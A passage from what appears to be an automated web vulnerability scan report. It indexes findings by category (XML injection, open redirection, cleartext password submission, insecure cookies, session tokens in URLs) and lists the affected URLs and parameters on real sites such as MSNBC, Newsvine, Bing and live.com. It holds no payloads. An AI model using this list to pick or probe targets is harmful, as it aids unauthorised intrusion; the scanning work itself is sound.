6.76. http://static.ak.fbcdn.net/crossdomain.xml

6.77. http://suzanne-choney.newsvine.com/crossdomain.xml

6.78. http://technolog2.newsvine.com/crossdomain.xml

6.79. http://thelastword.msnbc.redacted/crossdomain.xml

6.80. http://today.msnbc.com/crossdomain.xml

6.81. http://toddkenreck.newsvine.com/crossdomain.xml

6.82. http://top.newsvine.com/crossdomain.xml

6.83. http://tv.msnbc.com/crossdomain.xml

6.84. http://wbenedetti.newsvine.com/crossdomain.xml

6.85. http://www.adobe.com/crossdomain.xml

6.86. http://www.amazon.com/crossdomain.xml

6.87. http://www.blackvoices.com/crossdomain.xml

6.88. http://www.dooce.com/crossdomain.xml

6.89. http://www.habitablezone.com/crossdomain.xml

6.90. http://www.hoovers.com/crossdomain.xml

6.91. http://www.msnbc.com/crossdomain.xml

6.92. https://www.newsvine.com/crossdomain.xml

6.93. http://www.polls.newsvine.com/crossdomain.xml

6.94. http://www.popularmechanics.com/crossdomain.xml

6.95. http://www.reuters.com/crossdomain.xml

6.96. http://www.signonsandiego.com/crossdomain.xml

6.97. http://www.tigerdirect.com/crossdomain.xml

6.98. http://www.walmart.com/crossdomain.xml

6.99. http://www.zacks.com/crossdomain.xml

6.100. http://advertising.redacted/crossdomain.xml

6.101. http://articles.redacted/crossdomain.xml

6.102. http://seedmagazine.com/crossdomain.xml

6.103. https://twitter.com/crossdomain.xml

6.104. http://www.livescience.com/crossdomain.xml

6.105. http://www.twitter.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.ae.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.rad.redacted/clientaccesspolicy.xml

7.3. http://b.voicefive.com/clientaccesspolicy.xml

7.4. http://ec.redcated/clientaccesspolicy.xml

7.5. http://jp.video.redacted/clientaccesspolicy.xml

7.6. http://latino.aol.com/clientaccesspolicy.xml

7.7. http://latino.video.redacted/clientaccesspolicy.xml

7.8. http://netscape.aol.com/clientaccesspolicy.xml

7.9. http://ninemsn.video.redacted/clientaccesspolicy.xml

7.10. http://s0.2mdn.net/clientaccesspolicy.xml

7.11. http://wrapper.g.redacted/clientaccesspolicy.xml

7.12. http://www.ticketcity.com/clientaccesspolicy.xml

7.13. http://blstj.redacted/clientaccesspolicy.xml

7.14. http://dateline.msnbc.com/clientaccesspolicy.xml

7.15. http://explore.live.com/clientaccesspolicy.xml

7.16. http://hardball.msnbc.com/clientaccesspolicy.xml

7.17. http://msnbc.com/clientaccesspolicy.xml

7.18. http://msnbcmedia.redacted/clientaccesspolicy.xml

7.19. http://mtp.msnbc.com/clientaccesspolicy.xml

7.20. http://nbcsports.msnbc.com/clientaccesspolicy.xml

7.21. http://nightly.msnbc.com/clientaccesspolicy.xml

7.22. http://rachel.msnbc.com/clientaccesspolicy.xml

7.23. http://today.msnbc.com/clientaccesspolicy.xml

7.24. http://tv.msnbc.com/clientaccesspolicy.xml

7.25. http://www.msnbc.com/clientaccesspolicy.xml

7.26. http://services.money.redacted/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://digg.com/search

8.2. http://eurekalert.org/

8.3. http://msn.chemistry.com/cp/landing/44762

8.4. http://msn.chemistry.com/cp/landing/57269

8.5. http://spacefellowship.com/

8.6. http://www.dailygrail.com/

8.7. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

8.8. http://www.polls.newsvine.com/_vine/js/m1/vine.js

8.9. http://www.scientificamerican.com/blog/observations/

8.10. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

8.11. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

8.12. http://www.unmannedspaceflight.com/

8.13. http://www.zacks.com/

9. XML injection

9.1. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [REST URL parameter 1]

9.2. http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 1]

9.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

9.4. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

9.5. http://beacon.jump-time.net/jt.js [REST URL parameter 1]

9.6. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [format parameter]

9.7. http://cdn-forums.scout.com/adfeed.ashx [format parameter]

9.8. http://edge.quantserve.com/quant.js [REST URL parameter 1]

9.9. http://forums.silverlight.net/user/viewonline.aspx [CSAnonymous cookie]

9.10. http://forums.silverlight.net/user/viewonline.aspx [CommunityServer-LastVisitUpdated-2101 cookie]

9.11. http://forums.silverlight.net/user/viewonline.aspx [omniID cookie]

9.12. http://forums.silverlight.net/user/viewonline.aspx [s_sq cookie]

9.13. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [allowEmptySearch parameter]

9.14. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [appid parameter]

9.15. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [focusOnInit parameter]

9.16. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [minimumTermLength parameter]

9.17. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [overrideWatermark parameter]

9.18. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [scopeid parameter]

9.19. http://img.widgets.video.s-redacted/resource.aspx [responseEncoding parameter]

9.20. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

9.21. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.22. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.23. https://security.live.com/LoginStage.aspx [lmif parameter]

9.24. http://services.money.redacted/QuoteService/dynamic [format parameter]

9.25. http://services.money.redacted/quoteservice/streaming [format parameter]

9.26. http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 1]

9.27. http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 2]

10. SSL cookie without secure flag set

10.1. https://careers.microsoft.com/

10.2. https://login.silverlight.net/login/createuser.aspx

10.3. https://login.silverlight.net/login/signin.aspx

10.4. https://secure.opinionlab.com/ccc01/comment_card.asp

10.5. https://secure.opinionlab.com/ccc01/o.asp

10.6. https://secure.opinionlab.com/ccc01/o.asp

10.7. https://security.live.com/LoginStage.aspx

10.8. https://security.live.com/LoginStage.aspx

10.9. https://twitter.com/ToddKenreck

10.10. https://www.msnfeedback.com/perseus/se.ashx

10.11. https://login.live.com/login.srf

10.12. https://login.live.com/pp900/

10.13. https://login.live.com/ppsecure/post.srf

10.14. https://login.live.com/ppsecure/secure.srf

10.15. https://login.live.com/resetpw.srf

10.16. https://msnia.login.live.com/ppsecure/post.srf

10.17. https://sb.voicefive.com/b

10.18. https://www.newsvine.com/

10.19. https://www.newsvine.com/_action/user/logout

10.20. https://www.newsvine.com/_nv/accounts/global/information

10.21. https://www.newsvine.com/_nv/accounts/login

10.22. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

10.23. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

10.24. https://www.newsvine.com/_nv/accounts/register

10.25. https://www.newsvine.com/_nv/api/accounts/login

10.26. https://www.newsvine.com/_nv/api/accounts/resetPassword

11. Session token in URL

11.1. http://clk.redcated/go/286026710/direct

11.2. http://cosmiclog.msnbc.redacted/

11.3. http://local.redacted/

11.4. http://local.redacted/gas-traffic.aspx

11.5. http://local.redacted/hourly.aspx

11.6. http://local.redacted/movies-events.aspx

11.7. http://local.redacted/news.aspx

11.8. http://local.redacted/restaurants.aspx

11.9. http://local.redacted/sports.aspx

11.10. http://local.redacted/ten-day.aspx

11.11. http://local.redacted/weather.aspx

11.12. http://stackauth.com/auth/global/read

11.13. http://thelastword.msnbc.redacted/

11.14. http://www.amazon.com/gp/product/0470650923

11.15. http://www.amazon.com/gp/product/0672333368

11.16. http://www.amazon.com/gp/product/0981511821

11.17. http://www.amazon.com/gp/product/184968006X

11.18. http://www.amazon.com/gp/product/1935182374

11.19. http://www.facebook.com/extern/login_status.php

11.20. http://www.redacted/scp/AuthServiceTwitter.aspx

11.21. http://www.thespacereview.com/

12. SSL certificate

12.1. https://signup.live.com/

12.2. https://www.msnfeedback.com/

12.3. https://www.newsvine.com/

12.4. https://secure.scout.com/

12.5. https://secure.shared.live.com/

12.6. https://secure.wlxrs.com/

12.7. https://security.live.com/

12.8. https://twitter.com/

13. Password field submitted using GET method

13.1. http://digg.com/search

13.2. http://www.scientificamerican.com/blog/observations/

13.3. http://www.scientificamerican.com/errors/404.cfm

14. ASP.NET ViewState without MAC enabled

14.1. http://beta-ads.ace.advertising.com/

14.2. http://college.scout.com/

14.3. http://content.scout.com/a.z

14.4. http://jcfootball.scout.com/

14.5. http://mlb.scout.com/

14.6. http://p.ace.advertising.com/

14.7. http://preps.scout.com/

14.8. http://r1-ads.ace.advertising.com/

14.9. http://r1.ace.advertising.com/

14.10. http://recruiting.scout.com/a.z

14.11. http://rss.scout.com/rss.aspx

14.12. https://secure.scout.com/a.z

14.13. http://www.scout.com/

14.14. http://www.scout.com/3/college-links.html

14.15. http://www.scout.com/3/company.html

14.16. http://www.scout.com/3/fair-use.html

14.17. http://www.scout.com/3/jobs.html

14.18. http://www.scout.com/3/privacy-policy.html

14.19. http://www.scout.com/3/recruiting-links.html

14.20. http://www.scout.com/3/security-information.html

14.21. http://www.scout.com/3/terms-of-service.html

14.22. http://www.scout.com/a.z

14.23. http://www.scout.com/search.aspx

14.24. http://www.scout.com/widgets/

15. Open redirection

15.1. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]

15.2. http://developer.windowsphone.com/ [name of an arbitrarily supplied request parameter]

15.3. http://go.microsoft.com/fwlink/ [name of an arbitrarily supplied request parameter]

15.4. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]

15.5. http://jp.video.redacted/ [name of an arbitrarily supplied request parameter]

15.6. http://latino.video.redacted/ [name of an arbitrarily supplied request parameter]

15.7. http://ninemsn.video.redacted/ [name of an arbitrarily supplied request parameter]

15.8. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter]

15.9. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter]

15.10. http://video.fr.sympatico.redacted/ [name of an arbitrarily supplied request parameter]

15.11. http://video.sympatico.redacted/ [name of an arbitrarily supplied request parameter]

16. Cookie scoped to parent domain

16.1. http://c.microsoft.com/trans_pixel.aspx

16.2. http://msn.whitepages.com/

16.3. http://silverlight.codeplex.com/

16.4. http://t.mookie1.com/t/v1/imp

16.5. http://www.amazon.com/gp/product/0470650923

16.6. http://www.amazon.com/gp/product/0672333368

16.7. http://www.amazon.com/gp/product/0981511821

16.8. http://www.amazon.com/gp/product/184968006X

16.9. http://www.amazon.com/gp/product/1935182374

16.10. http://www.bing.com/travel/

16.11. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do

16.12. http://www.bing.com/travel/deals/last-minute-flight-deals.do

16.13. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

16.14. http://www.bing.com/travel/hotels

16.15. http://www.dailygrail.com/

16.16. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

16.17. http://www.kanoodle.com/

16.18. http://www.kanoodle.com/ajax/search_spy_data.html

16.19. http://www.kanoodle.com/ajax/search_spy_data_today.html

16.20. http://www.kanoodle.com/search_spy.html

16.21. http://www.opensource.org/licenses/gpl-license.php

16.22. http://www.opensource.org/licenses/mit-license.php

16.23. http://www.popsci.com/

16.24. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

16.25. http://www.zacks.com/

16.26. http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227

16.27. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

16.28. http://ad.doubleclick.net/click

16.29. http://ad.doubleclick.net/clk

16.30. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

16.31. http://add.my.yahoo.com/rss

16.32. http://ads.revsci.net/adserver/ako

16.33. http://alex-johnson.newsvine.com/

16.34. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php

16.35. http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php

16.36. http://ar.voicefive.com/b/wc_beacon.pli

16.37. http://ar.voicefive.com/bmx3/broker.pli

16.38. http://articles.redacted/news/news.aspx

16.39. http://athima-chansanchai.newsvine.com/

16.40. http://b.rad.redacted/ADSAdClient31.dll

16.41. http://b.scorecardresearch.com/b

16.42. http://b.scorecardresearch.com/r

16.43. http://b.voicefive.com/b

16.44. http://boyle.newsvine.com/

16.45. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.46. http://c.redcated/c.gif

16.47. http://c.bing.com/c.gif

16.48. http://c.redacted/c.gif

16.49. http://c.statcounter.com/t.php

16.50. http://calendar.live.com/calendar/calendar.aspx

16.51. http://careers.redacted/

16.52. http://clk.redcated/APM/go/139941180/direct

16.53. http://clk.redcated/APM/go/148848786/direct

16.54. http://clk.redcated/BEL/go/262582811/direct

16.55. http://clk.redcated/CNT/go/286609711/direct

16.56. http://clk.redcated/CNT/go/287065754/direct

16.57. http://clk.redcated/CNT/go/299297287/direct

16.58. http://clk.redcated/NFX/go/297941249/direct/01/

16.59. http://clk.redcated/ULA/go/296652509/direct

16.60. http://clk.redcated/go/286026710/direct

16.61. http://clk.redcated/go/286609711/direct

16.62. http://clk.redcated/go/287065754/direct

16.63. http://clk.redcated/go/296652509/direct

16.64. http://clk.redcated/goiframe/184054348/262582811/direct/01

16.65. http://clk.redcated/goiframe/199711109/299297287/direct

16.66. http://context3.kanoodle.com/cgi-bin/context.cgi

16.67. http://conveu.admailtiser.com/st

16.68. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js

16.69. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

16.70. http://deals.redacted/

16.71. http://dg.specificclick.net/

16.72. http://editorial.autos.redacted/article.aspx

16.73. http://editorial.autos.redacted/articles/default.aspx

16.74. http://editorial.autos.redacted/blogs/autosblog.aspx

16.75. http://editorial.autos.redacted/media/default.aspx

16.76. http://editorial.autos.redacted/media/video/default.aspx

16.77. http://editorial.autos.redacted/new-cars/default.aspx

16.78. http://editorial.autos.redacted/slideshow.aspx

16.79. http://editorial.autos.redacted/used-cars/default.aspx

16.80. http://entertainment.redacted/

16.81. http://entertainment.redacted/news/

16.82. http://entertainment.redacted/video/

16.83. http://expression.microsoft.com/en-us/cc136530.aspx

16.84. http://health.redacted/

16.85. http://helenaspopkin.newsvine.com/

16.86. http://ib.adnxs.com/getuid

16.87. http://ib.adnxs.com/seg

16.88. http://ingame.newsvine.com/

16.89. http://js.revsci.net/gateway/gw.js

16.90. http://latino.redacted/

16.91. http://leadback.advertising.com/adcedge/lb

16.92. http://lifestyle.redacted/

16.93. http://lifestyle.redacted/relationships/

16.94. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

16.95. http://lifestyle.redacted/your-home/

16.96. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

16.97. http://lifestyle.redacted/your-life/family-parenting/article.aspx

16.98. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx

16.99. http://lifestyle.redacted/your-life/your-money-today/article.aspx

16.100. http://lifestyle.redacted/your-life/your-money-today/video.aspx

16.101. http://lifestyle.redacted/your-look/

16.102. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

16.103. http://lifestyle.redacted/your-look/video/

16.104. http://live.newsvine.com/

16.105. http://local.redacted/

16.106. http://local.redacted/events.aspx

16.107. http://local.redacted/gas-traffic.aspx

16.108. http://local.redacted/hourly.aspx

16.109. http://local.redacted/movies-events.aspx

16.110. http://local.redacted/news.aspx

16.111. http://local.redacted/restaurants.aspx

16.112. http://local.redacted/sports.aspx

16.113. http://local.redacted/ten-day.aspx

16.114. http://local.redacted/weather.aspx

16.115. http://media.fastclick.net/w/tre

16.116. http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878

16.117. http://michaelwann.newsvine.com/

16.118. http://money.redacted/auto-insurance/article.aspx

16.119. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

16.120. http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx

16.121. http://money.redacted/identity-theft/default-dyn.aspx

16.122. http://money.redacted/market-news/post.aspx

16.123. http://money.redacted/mutual-fund/default-dyn.aspx

16.124. http://money.redacted/saving-money/50-30-20-budget.aspx

16.125. http://redacted/

16.126. http://redacted/detail/stock_quote

16.127. http://redacted/inc/Attributions.asp

16.128. http://redacted/personal-finance/

16.129. http://movies.redacted/

16.130. http://movies.redacted/academy-awards/snubs/

16.131. http://movies.redacted/jason-statham/photo-gallery/feature/

16.132. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

16.133. http://movies.redacted/new-on-dvd/movies/

16.134. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

16.135. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

16.136. http://movies.redacted/showtimes/showtimes.aspx

16.137. http://movies.redacted/the-rundown/the-guard/story_5/

16.138. http://msdn.microsoft.com/

16.139. http://msdn.microsoft.com/en-us/library/cc838158(VS.95

16.140. http://msdn.microsoft.com/en-us/library/cc838158(VS.95).aspx

16.141. http://msdn.microsoft.com/en-us/library/ff637515(VS.92

16.142. http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx

16.143. http://msn.careerbuilder.com/

16.144. http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

16.145. http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

16.146. http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

16.147. http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

16.148. http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx

16.149. http://msn.careerbuilder.com/msn/default.aspx

16.150. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845

16.151. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724

16.152. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812

16.153. https://msnia.login.live.com/ppsecure/post.srf

16.154. http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}

16.155. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}

16.156. http://music.redacted/

16.157. http://my.live.com/

16.158. http://my.redacted/

16.159. http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

16.160. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

16.161. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

16.162. http://onlinehelp.microsoft.com/en-us/msn/money.aspx

16.163. http://onlinehelp.microsoft.com/en-us/msn/qwlinfo.aspx

16.164. http://onlinehelp.microsoft.com/en-us/msn/qwlnotyours.aspx

16.165. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx

16.166. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js

16.167. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

16.168. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

16.169. http://pix04.revsci.net/D08734/a1/0/0/0.gif

16.170. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

16.171. http://ptsd.eyewonder.com/ewr

16.172. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

16.173. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

16.174. http://r1-ads.ace.advertising.com/site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F

16.175. http://realestate.redacted/

16.176. http://realestate.redacted/OmRedir.aspx

16.177. http://realestate.redacted/article.aspx

16.178. http://realestate.redacted/slideshow.aspx

16.179. http://redtape.newsvine.com/

16.180. https://sb.voicefive.com/b

16.181. http://search.redacted/

16.182. https://security.live.com/LoginStage.aspx

16.183. https://security.live.com/LoginStage.aspx

16.184. http://seg.admailtiser.com/st

16.185. https://signup.live.com/signup.aspx

16.186. https://signup.live.com/signup.aspx

16.187. http://social.entertainment.redacted/bloglist.aspx

16.188. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx

16.189. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx

16.190. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx

16.191. http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads

16.192. http://specials.redacted/

16.193. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

16.194. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

16.195. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx

16.196. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx

16.197. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

16.198. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

16.199. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx

16.200. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

16.201. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

16.202. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx

16.203. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx

16.204. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx

16.205. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx

16.206. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

16.207. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx

16.208. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

16.209. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx

16.210. http://specials.redacted/IEIncreaseFont_preview.aspx

16.211. http://specials.redacted/alphabet.aspx

16.212. http://suzanne-choney.newsvine.com/

16.213. http://technolog2.newsvine.com/

16.214. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

16.215. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

16.216. http://toddkenreck.newsvine.com/

16.217. http://top.newsvine.com/

16.218. http://top.newsvine.com/users

16.219. http://tv.redacted/

16.220. http://tv.redacted/tv/article.aspx

16.221. http://us.mc1125.mail.yahoo.com/mc/compose

16.222. http://redcated/CNT/iview/299297287/direct

16.223. http://wbenedetti.newsvine.com/

16.224. http://www.bing.com/

16.225. http://www.bing.com/challenge

16.226. http://www.bing.com/events/search

16.227. http://www.bing.com/fd/ls/GLinkPing.aspx

16.228. http://www.bing.com/fd/ls/l

16.229. http://www.bing.com/finance/stockscreener

16.230. http://www.bing.com/images/results.aspx

16.231. http://www.bing.com/local/ypdefault.aspx

16.232. http://www.bing.com/maps/

16.233. http://www.bing.com/maps/default.aspx

16.234. http://www.bing.com/maps/explore/

16.235. http://www.bing.com/msnhomepagehistory.aspx

16.236. http://www.bing.com/news/results.aspx

16.237. http://www.bing.com/news/search

16.238. http://www.bing.com/news/search

16.239. http://www.bing.com/results.aspx

16.240. http://www.bing.com/sck

16.241. http://www.bing.com/search

16.242. http://www.bing.com/search

16.243. http://www.bing.com/search/

16.244. http://www.bing.com/shopping

16.245. http://www.bing.com/shopping/bird-feeders/search

16.246. http://www.bing.com/shopping/content/search

16.247. http://www.bing.com/shopping/healthy-cooking/r/151

16.248. http://www.bing.com/shopping/makeup/c/4259

16.249. http://www.bing.com/shopping/search

16.250. http://www.bing.com/shopping/swimwear/c/4503

16.251. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

16.252. http://www.bing.com/travel/content/search

16.253. http://www.bing.com/videos/browse

16.254. http://www.bing.com/videos/results.aspx

16.255. http://www.bing.com/videos/results.aspx

16.256. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

16.257. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

16.258. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

16.259. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

16.260. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

16.261. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt

16.262. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

16.263. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

16.264. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

16.265. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2

16.266. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

16.267. http://www.facebook.com/2008/fbml

16.268. http://www.facebook.com/HelenASPopkin

16.269. http://www.facebook.com/campaign/impression.php

16.270. http://www.facebook.com/sharer.php

16.271. http://www.facebook.com/todd.kenreck

16.272. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

16.273. http://www.iis.net/

16.274. http://www.live.com/

16.275. http://www.morningstar.com/

16.276. http://www.redacted/

16.277. http://www.msnbc.redacted/

16.278. http://www.msnbc.redacted/id/8004316/

16.279. http://www.newsvine.com/

16.280. http://www.newsvine.com/_action/article/emailThis

16.281. http://www.newsvine.com/_action/user/logout

16.282. http://www.newsvine.com/_action/user/startTracking

16.283. http://www.newsvine.com/_action/user/stopTracking

16.284. http://www.newsvine.com/_api/comments/getComments

16.285. http://www.newsvine.com/_api/question/getUserData

16.286. http://www.newsvine.com/_api/user/convTracker

16.287. http://www.newsvine.com/_nv/accounts/newsvine/emailAlerts

16.288. http://www.newsvine.com/_nv/api/accounts/login

16.289. http://www.newsvine.com/_tools/user/login

16.290. http://www.newsvine.com/_vine/js/m1/global.js

16.291. https://www.newsvine.com/

16.292. https://www.newsvine.com/_action/user/logout

16.293. https://www.newsvine.com/_nv/accounts/global/information

16.294. https://www.newsvine.com/_nv/accounts/login

16.295. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

16.296. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

16.297. https://www.newsvine.com/_nv/accounts/register

16.298. https://www.newsvine.com/_nv/api/accounts/login

16.299. https://www.newsvine.com/_nv/api/accounts/resetPassword

16.300. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

16.301. http://www.youtube.com/embed/CKZzn00w01M

16.302. http://www.youtube.com/embed/mm8byzo8zWE

17. Cookie without HttpOnly flag set

17.1. http://advertising.aol.com/privacy/advertisingcom/opt-out

17.2. http://c.microsoft.com/trans_pixel.aspx

17.3. https://careers.microsoft.com/

17.4. http://ccc01.opinionlab.com/o.asp

17.5. http://ccc01.opinionlab.com/o.asp

17.6. http://ccc01.opinionlab.com/o.asp

17.7. http://dating.redacted/cp.aspx

17.8. http://dating.redacted/en-us/partner/msn/38028.html

17.9. http://dating.redacted/index.aspx

17.10. http://dating.redacted/search/index.aspx

17.11. http://games.redacted/

17.12. http://malexj.tk/6M

17.13. http://msn.chemistry.com/cp/landing/44762

17.14. http://msn.chemistry.com/cp/landing/57269

17.15. http://msn.foxsports.com/video

17.16. http://msn.whitepages.com/

